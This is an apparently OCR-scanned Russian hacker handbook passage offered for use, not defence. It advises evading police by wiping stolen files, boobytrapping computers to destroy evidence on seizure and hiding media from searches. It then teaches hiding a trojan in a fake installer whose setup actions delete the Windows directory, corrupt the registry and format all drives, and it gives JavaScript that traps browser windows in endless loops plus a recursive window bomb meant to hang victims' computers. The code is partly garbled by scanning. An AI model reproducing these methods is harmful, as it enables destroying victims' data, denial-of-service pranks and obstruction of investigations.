Более неприятная разновидность журналов регистрации ведет запись: кто из пользователей что сделал, когда и почему. В некоторых компаниях сотрудники заносят в журнал все телефонные звонки, а каждый месяц сравнивают сделанные записи с телефонными счетами. В случае, если вы проникнете в офис и станете делать удаленные вызовы, вас легко обнаружат. Лаже если вы занимаетесь этим дома, или в телефонной будке, журнал может вас засечь. Компании могут заносить в журнал приход и уход сотрудников и то, как используется оборудование. В этом случае нельзя допустить ни малейшей ошибки.

«В людях» и на местности

Занятия хакерством на людях — взлом общественных компьютеров или терминалов, социальная инженерия, даже исследования в библиотеке — гораздо опаснее, нежели занятия хакерством у себя дома. В этом случае появляется дополнительная опасность того, что вас узнают или арестуют.

Выбирая место для «публичного» хакерства, используйте проверенные взломщические уловки. Когда взломщик входит в дом, он прежде всего находит все выходы. Не садитесь за компьютер, от которого можно убежать только в одном направлении. Взломщик всегда рад любому кусту, за которым можно спрятаться; постарайтесь выбрать компьютер, который был бы каким-то образом «спрятан», если за спиной у вас будет стена, а впереди — что-то еще, никто не сможет заглянуть вам через плечо.

Никогда не позволяйте себе забыть, где вы находитесь, увлекшись работой. Ведь именно это и происходит с обычными пользователями, когда вы занимаетесь «подглядыванием через плечо». Хакер должен думать о безопасности больше, чем легальный пользователь. Приготовьте правдоподобную историю на случай, если вас заметят. Одевайтесь соответственно случаю, и всегда в чистую одежду.

Наконец, помните, что в компьютерном зале почти всегда найдется хотя бы один хакер или кракер. Опасайтесь «подглядывателей» и прочих хитрецов. Сидя за общественным компьютером, я всегда несколько раз нажимаю клавишу Break перед окончательной загрузкой, на случай, если кто-то установил поддельную программу-ловушку. При выходе тоже соблюдайте осторожность.

 Некоторые терминалы снабжены буфером экрана. Этот буфер после выхода из системы часто не очищается сразу, и вы можете со спокойной душой выйти из-за компьютера, оставив на нем запись всех проделанных вами Действий.

Связь с компьютером прервана: минимизация потерь

Но что, если все эти советы вам не помогут, и вас все-таки поймают? Стоит подготовиться к такому повороту событий, чтобы блюстители закона не могли найти, в чем бы вас обвинить.

Сопровождение вашего компьютера

Следует регулярно просматривать файлы, хранящиеся на вашем компьютере, и уничтожать те, которые вы незаконно присвоили. Не просто стирайте их: записывайте на их место тексты, состоящие из единственного повторяющегося символа, шифруйте самыми сложными ключами, и только затем стирайте. Можно использовать программу «Wipefile». Тогда компьютерным копам не к чему будет придраться. Помните, что иногда куски файлов теряются, или отрываются от основной части, или дублируются где-нибудь на диске. Регулярно ищите таких «сироток» и стирайте их, если они содержат что-то нелегальное. Любой файл, который вы не можете просто уничтожить, надо шифровать и, в идеале, скрывать под не вызывающим подозрений именем.

На вашем компьютере могут быть и другие вещи, которые можно использовать в качестве обвинения против вас: терминальные программы, автонаборы, базы данных с номерами модемов и кодов доступа, списки номеров BBS и т. п. Для того, чтобы сделать их безопасными, наряду с профаммными «замками» на своем компьютере я использую замки физические.

Прежде чем начать работу, мои компьютеры проверяют, был ли набран на клавиатуре определенный ключ. В случае, если компьютер загружается, не обнаружив ключа, он знает: что-то не так. Тогда он вызывает подпрограмму времени и даты, которая показывает правильное время и дату, тем самым давая мне возможность откорректировать их. Я должен ввести определенные время и дату, в противном же случае компьютер выдаст сообщение «ИДЕТ ЗАГРУЗКА МЕНЮ» и перенесет директорию, в которой я храню все свои безобразия. Там тоже будет открытое меню, но в него никто не сможет войти или выйти из него, не введя правильный пароль. К счастью, мои компьютеры ни разу не конфисковали. В случае, если это произойдет, мне жаль того простака, которому придется продираться сквозь насаженные мною дебри; все мои системы настроены на уничтожение незаконного содержимого в определенных ситуациях. Даже если он подготовится к этому, он не сможет узнать, как это предотвратить!

Как хранить остальные материалы

В случае, если у служителя закона имеется ордер на ваш арест, он сможет совершенно легально забрать все ваши компьютеры, периферийное оборудование, чистые дискеты и аудиокассеты, коммерческое программное обеспечение и документацию, распечатки, телефоны и т.п. — любое электронное оборудование, равно как и любые бумаги, подтверждающие, что вы являетесь владельцем этого оборудования, книги, журналы — все, что угодно. Именно так и происходит во время полицейских рейдов. Вдобавок, если преступления, в которых вы подозреваетесь, связаны с конкретным, местом или человеком, у вас заберут любые свидетельства того, что существует связь между этим местом, или личностью, и совершенным преступлением. Ордера на арест пишутся специально для того, чтобы узаконить захват такого количества предметов, и будьте уверены — они возьмут все, что захотят. И не рассчитывайте, что вам хоть что-то вернут. Именно поэтому вначале я упоминал, что хакеру необязательно иметь собственный компьютер.

Печально, но факт — вам лучше всего прятать свое имущество, когда вы не находитесь дома или не пользуетесь им. Распечатки и заметки лучше хранить в папках с названиями типа «Школьные сочинения», написанными крупными буквами, — тогда они, может быть, и не привлекут внимания. Весьма распространен миф о том, что компьютерные распечатки якобы не могут использоваться на суде в качестве вещественного доказательства, так как их легко подделать. На самом деле распечатки являются таким же доказательством, как и любые другие записи, если удастся доказать, что они были сделаны во время подготовки или совершения незаконных действий. Распечатки, сделанные позднее, и не вами, доказательством не являются. Но, с другой стороны, если в памяти вашего компьютера хранятся свидетельства ваших незаконных действий, блюстители закона найдут способ представить их суду в качестве доказательства. (Правда, они настолько любят разбивать конфискованные компьютеры, что вам, право же, не о чем беспокоиться!)

Пряча свое имущество, важно сделать так, чтобы оно выглядело как нечто, не имеющее отношения к компьютерам или электронике. Офицеры полиции умудряются получать такие ордера, которые разрешают им забирать все, что имеет хотя бы отдаленное отношение к электричеству. Например, незаконная информация подпольно распространяется на аудиокассетах. Конечно, мы поместим подобную информацию на купленные в магазине кассеты с надписями вроде «Битлз», но копы знают об этом, и захотят забрать все наши записи, включая и те, которые выглядят совсем невинно.

Хакеры обмениваются информацией и хранят записи на дискетах. Значит, если у вас есть коробка подобных дискет, вы не можете просто наклеить на них этикетки с названиями игр — вас все равно заподозрят. К тому же, полиция вряд ли станет разбираться с надписями на дискетах. Значит, вам придется спрятать сами дискеты, способом, не имеющим от- ношения к технике. То же самое относится и к прочему электронному оборудованию. Так, я храню свои резервные дискеты в коробке из-под крекеров — при этом я не являюсь параноиком. Мой лаптоп хранится в большой коробке из-под хлопьев на верхней полке чулана. Мне так спокойнее. Вы уже знаете, что компании и Предприятия могут оставлять ценную информацию в мусорных баках. Вам необходимо осознать, что и ваш мусор может так же пригодиться тому, кто хочет обвинить вас в компьютерном преступлении. Все подобные отходы следует сначала подвергать необратимому разрушению, а затем уносить подальше от дома. Распечатки намачивайте, и лишь затем разрывайте. Содержимое дискет шифруйте, потом уничтожайте. Дискеты размагничивайте сильным магнитом, потом крошите на куски. Это не сумасшествие — методы восстановления уничтоженной электронным способом информации существуют. После все это можно выбросить в общественный мусорный контейнер. Я не шучу! Следуйте этим советам — и на вас не навесят ярлык «похитителя промышленных секретов»!

Как сделать так, чтобы вас поймали

На этот раз я хотел бы предложить вам список методов, которые НЕ НАДО использовать, иначе у вас будут неприятности. Вот пять способов, с помощью которых можно схватить хакера за руку:

1.        С помощью слежки или техническими средствами.

2.        С помощью доносчика.

3.        Объединив против него несколько агентств.

4.        По его ошибке.

5.        Узнав его.

Вас могут поймать, выследив по телефонным линиям или другими техническими средствами, вроде журналов регистрации. Так что не оставляйте за собой следов. Все время меняйте компьютеры и телефоны, с которых вы делаете удаленные вызовы. На вас могут донести. Будьте осторожны, общаясь с другими хакерами. Не рассказывайте всем подряд о своих достижениях. Прежде всего, обращайтесь с людьми, с которыми ведете разговоры о хакерстве или вместе занимаетесь хакерством, так, как вам хотелось бы, чтобы они обращались с вами.

В случае, если на вас станут охотиться сразу много агентств, вас непременно поймают. Не крадите, не разрушайте, не занимайтесь вандализмом. У хакеров и так неважная репутация, в основном, потому, что большинство пытающихся практиковать хакерство — это прыщавые псевдоанархисты старшего школьного возраста. В случае, если вы соблюдаете хакерскую этику, на вас не станут устраивать травлю. Вас могут поймать из-за вашей собственной ошибки. Ошибкой является несоблюдение нижеследующих предосторожностей.

Всегда подумайте, прежде чем действовать. Не раскрывайте никаких сведений о себе. Не забывайте уничтожать, а не стирать, резервные файлы; это особенно касается временных файлов, которые создаются без вашего участия, автоматически. В случае, если вы будете осторожны, вам удастся практически полностью избежать ошибок. Но даже самый осторожный хакер может попасться, веруя в стопроцентный успех своего плана действий, тогда как на деле в нем куча недостатков. Например, в 1974 году преступник в Токио пытался использовать одно из основных свойств электронной передачи данных — задержку, которая происходит в то время, когда данные идут по кабелям или телефонным линиям. Преступник открыл банковский счет, использовав фальшивое имя Кобаяши, и начал потихоньку перетягивать небольшие суммы из банкоматов, разбросанных по всей Японии. Каждый раз, перетащив немного денег, он звонил в банк, чтобы узнать текущее состояние своего счета. Таким образом ему удалось выяснить, что центральному компьютеру банка требуется двадцать минут, чтобы зарегистрировать отток денег с удаленной машины. Позднее Кобаяши решил воспользоваться этой информацией. Он перевел на свой счет 5 миллионов иен, рассчитав, что у него в запасе будет двадцать минут, чтобы унести ноги, пока служащие банка станут ожидать, когда главный компьютер получит информацию о том, с какого автомата была снята такая сумма. План провалился — Кобаяши не подумал, что программисты банка смогу перепрограммировать центральный компьютер для немедленной идентификации использованной преступником машины. Грабитель не успел снять со счета свои деньги, как его схватили.

 Просматривайте свои планы на случай неожиданных поворотов, и помните, что по ту сторону линии могут быть люди, стремящиеся вас схватить. И, наконец, вас могут узнать. Постарайтесь не выделяться среди массы людей. Самый надежный способ никогда не попасться — никогда не начинать заниматься хакерством. Тогда все, что вы сможете делать с компьютером, — это заниматься делами, решать задачки и иногда играть. Но, занявшись хакерством, вы приобретете целый мир. Вот и все. Желаю всем нам еще много мирных счастливых взломов!

Когда «скачиваешь» нелегально «прогу»...

Давай сразу к делу — мы ж с тобой хацкеры, а не чат-гёлз какие-нибудь. Итак, когда ты покупаешь (скачиваешь, нелегально приобретаешь) прогу, то в большинстве случаев для ее установки требуется запустить файл setup, где сначала тебе дают почитать лицензионное соглашение, потом выбрать директорию и все такое. Обычно, чтобы сделать такую установочную приблуду, программеры используют какой-нибудь install maker. Я упражнялся с Vise Installer (это как раз программка такого типа), поэтому все, что тут написано, относится к нему... Эта полезная штучка, предназначенная, на первый взгляд, для сугубо мирных целей, в умелых руках становится мощным оружием (как булыжник в руках пролетариата).

Первым делом скачиваешь (или находишь где-нибудь на сборнике) Vise (www.mindvision.com — там надо заполнить разную регистрационную шнягу, но это уже мелочи). Ломать ее, конечно, надо, но как, пояснять не буду.

Надо работать!

Маскируешь свое детище под дистрибутив какой-нибудь очень полезной прога, указываешь это в Screens. Всячески хвалишь и рекламируешь, добавляешь красивые картинки (настройка экранов осуществляется в меню screen посредством кнопки add screen). Самое простое — это запаковать в инсталлер твоего любимого трояна и в конце установки предложить юзверю его запустить или же создать в меню «пуск» ярлычок с красивой иконкой для запуска все того же трояна. Не правда ли — эстетично? Все для удобства пользователя, все для него, для ламера ушастого.

Но троян — это, если честно, прозаично, а ведь можно придумать что-нибудь повеселее. Ведь в процесс установки можно добавлять разный action (типа создания директории, удаления директории, внесения изменений в реестр и т.д.). Вот с этим и можно поприкалываться от души.

Смело жмешь «add\delete action» и выбираешь там то, что будешь ампутировать жертве... Количество вариантов ограничено только твоей фантазией. В качестве мелкой пакости можно стереть все ярлыки из главного меню, в качестве большой заподлянки — директорию Windows, или autoexec.bat (config.sys, msdos.sys, io.sys...). Никто не помешает тебе подправить win.ini на свое усмотрение. Ты сможешь забить вражеский винт всяким дерьмом по самые уши используя copy action. Можно даже загадить registry (тут придется попотеть, для каждого типа файлов надо будет добавлять Register file type, причем, надо не забывать ставить в опциях галочку на «Dont ask user to replace if already registred», а то жертва начнет по- дозревать...).

А каково будет изумление юзверя, когда при открытии *.txt или *.wav файла у него будет запускаться что-нибудь не относящееся к делу! Одним словом — почва для вендетты любого масштаба тебе просто про- писана, все ограничивается только извращенностью твоей фантазии. Ну а для того, чтобы юзверя окончательно хватил дядька Кондратий, можно предложить ему в Процессе установить DirectX 2.0 или показать какую-нибудь картинку с www.ob.da.ru.

В конце установки можно предложить на выбор обычное или низкоуровневое форматирование всех дисков, включая сетевые и СD-ROM. Да, кстати, можно создавать также и Uninstaller'ы, причем неумело созданный анинсталлер убивает regestry, так вот...

  Что? Ты еще сомневаешься? Нет, парень, это точно твой случай — неужели ты никогда не мечтал ненавязчиво пошутить над каким-нибудь ламерком? Давай, хватай Вайс Инсталлер, и вперед — творить, работать и создавать шедевры западло строения.

Защита

А нет ее. Нет и все тут. Конечно, если ты в setup впаяешь трояна, то AVP его рюхнет, а вот если будешь делать гадости через сам сетап, то ни один антивирус ничего не унюхает. Ну что, господа разработчики, об этой фишечке вы не задумывались никогда? Вот теперь подумайте. Удачи!

Скрипты — это круто

Внимай, даю установку: скрипты — это круто. Ты это знаешь, я это знаю, короче — мы это знаем. Установку дал! Успешно. Теперь о них — любимых скриптах — и поговорим. Приятно наваять своими ручками какую-нибудь скриптятину на яве и дать соседу-ламаку пропереться, а пока тот будет ее разглядывать — дать ему пинка. Вот только бага: по ходу все клевое в скриптинге уже придумано. Предложить что-либо кардинально новое (во всяком случае, мне) уже сложно, лучше пива попить пойти. С другой стороны, можно легко насочинять целый ворох вторичных вещей, которые при ближайшем рассмотрении сведутся к нагромождению все тех же базовых методов. А это неправильно — вторичное само по себе на хрен никому не нужно.

Наконец (не на конец, а в конце концов!), наступило «творческое озарение»: если нельзя ничего выжать внутри документа, то надо переходить на качественно новый уровень манипуляции самим окном броузера.

Сначала чуть-чуть информации для тех, кто забыл (или не знал).

В объектной модели современных броузеров (под современными я имею в виду Internet Explorer и Netscape Navigator) есть два очень интересных метода: window.reslzeTo (x,y) и window.moveTo (x,y), которые сулят просто огромные возможности. Первый метод изменяет размер «смотрового окна» броузера до указанных размеров (то есть х на у пикселей), а второй перемещает само окно, помещая левый верхний угол в точку с координатами х по горизонтали и у по вертикали. Таким образом, грамотно используя эти два метода, ты легко можешь добиться весьма интересных эффектов, которые буквально валят с ног неподготовленного зрителя.

Для начала давай рассмотрим простенький скриптик, отвечающий за перемещение окна броузера по десктопу и его отражение от «краев» экрана:

 

Скрипт 1: Окно в стиле Xonix

<script language = javascript> // Начинаем script блок

function move_the_window(){ // Наша стартовая функция

window.resizeTo(screen.width/2,screen.height/2);

// Сначала сжимаем окно до половины рабочего стола

window.moveTo(1,1);  // Теперь помещаем его в левый верхний угол экрана

var x=1; // Это будет наша Х-координата. Вначале равна единице

var y=1; // Это будет наша Y-координата. Вначале, равна единице

var dx=7; // Смещение по X

var dy=10; // ... и по Y

move(); // Теперь вызываем функцию, которая и будет двигать окно

function move(){ // Объявляем функцию

while(true){ // Объявляем бесконечный цикл

if(x>-(screen.width) || x<=0) dx=-dx; // В случае, если окно на краю экрана по X, меняем направление

if(y>=(screen.height) || y<=0) dy=-dy; // To же самое, но уже для Y

x+=dx; // Сдвинули по горизонтали

y+=dy; // ... и по вертикали

window.moveTo (х); // Нарисовали окно на новом месте

} // Конец нашего бесконечного цикла

} // Конец функции move

} // Конец функции move_the_window

// Ну, и закрываем script блок

</script>

<html>

<head>

<title>Script NK/title>

</head>

<body onload = "move_the_window()">

<centerxfont face = Times size = 6 color =redxi><JavaScript is

cool! </ix/fontx/center>

</body>

</html>

Как только страница полностью загружена, вызывается функция move_the_window. Она объявляет все необходимые переменные и помещает окно в левый верхний угол рабочего стола. Методы screen.width и screen.height возвращают нам значения (ширину и высоту) рабочего стола, и, уже зная их, мы сжимаем окно до половины.

Теперь приступим к функции move. Так как все действия здесь выполняются внутри бесконечного цикла, то окно так и будет безостановочно бегать по экрану. Попытка же свернуть его через task manager приведет к интересным визуальным эффектам (советую убедиться на собственном опыте). В случае, если ты хочешь, чтобы цикл выполнялся определенное количество раз, замени оператор while на while(var i < твое число) и добавь в конце цикла оператор i++.

С помощью метода resizeTo можно делать довольно любопытные вещи. Посмотри, как можно сжать окно до размеров заглавной рамки и заставить все это, как обычно, бегать по экрану:

 

Скрипт 2: Развитие темы

<script language = javascript> // Начинаем script блок

function move_the_windows(){ //Наша стартовая функция

window.resizeTo(screen.width,   25);   // Сжимаем окно номер 1

window.moveTo(0,1);   // Теперь помещаем его в левый верхний угол экрана

window2 = open("",   null);  // Создаем объект второго окна

window2.document.write("<title> Window N2</title>");   // Пишем в него заголовок

window2.resizeTo(screen.width,25);  // Сжимаем его и

window2.moveTo(0,   screen.height-25);  // помещаем в низ экрана

var dy1=2;   //. Начальное смещение для верхнего окна

var dy2=-2;   //  ...   и для нижнего

var y1 = 1;  // Y-координата верхнего окна

var y2 = screen.height-25;  // и Y-координата нижнего

move();   // Теперь вызываем функцию,   которая и будет двигать оба окна

function move(){ // Объявляем функцию

while(true){ // Объявляем бесконечный цикл

if (y1>=(screen. height) || y1 <=0) dy1=-dy1; // Меняем направление

if (y2>=(screen. height) || y2 <=0) dy2=-dy2; // To же для второго окна

y1+=dy1;   // Сдвинули первое окно по вертикали

y2+=dy2;   // ...   и второе

window.moveTo (0,y1);   // Нарисовали первое окно на новом Месте

window2.moveTo (0,у2);   // Нарисовали второе окно на новом месте

} // Конец нашего бесконечного цикла

} // Конец функции move

} // Конец функции move_the_windows

// Ну,   и закрываем script блок

</script>

<html>

<head>

<title>Script N2 Window 1</title>

</head>

<body onload = "move_the_windows()">

<centerxfont face = Times size = 6 color =red><i>JavaScript is

cool! </ix/fontx/center>

</body>

</html>

По сути, этот скрипт является расширением первого: новым является наличие двух окон, которые движутся независимо. Обрати внимание на механизм создания второго окна и способ записи HTML-тэгов через document.write.

Теперь, познакомившись с этими методами, ты, наверно уже задаешь себе вопрос: а нельзя ли через этот самый JavaScript подвесить клиентский компьютер? Что ж, это вполне возможно. Метод прост до неприличия: все, что только нужно делать, — открывать новые окна с максимальной быстротой. В этом случае у системы просто не хватает ресурсов, и все «повисает». Другое дело, что, на мой взгляд, этот примитивизм не является чем-то по-настоящему интересным, и, вероятно, раз ознакомившись с этим дубовым методом, ты больше не будешь тратить свое время на эту муру:

 

Скрипт 3: Генерация множества окон:

<script language = javascript> // Начинаем script блок

function generate_windows(){ // Наша стартовая функция

var i=1;

while (i < 10000){ // Главный цикл

window.openCscript3.htm"); // Новое окно с ссылкой на тот же HTML

файл

i++; // Увеличиваем счетчик цикла

} // Конец цикла

} // Конец generate_windows

// Закрываем script блок

</script>

<html>

<head>

<title>Multiple windows</title>

</head>

<body onload = "generate_windows()">

</body>

</html>

Фактически в теле главного цикла скрипт пробует открыть 10000 окон, причем каждое окно ссылается на тот же файл, то есть в свою очередь пытается открыть еще 10000 окон и т.д. Система просто не справляется с таким потоком и, увы, повисает.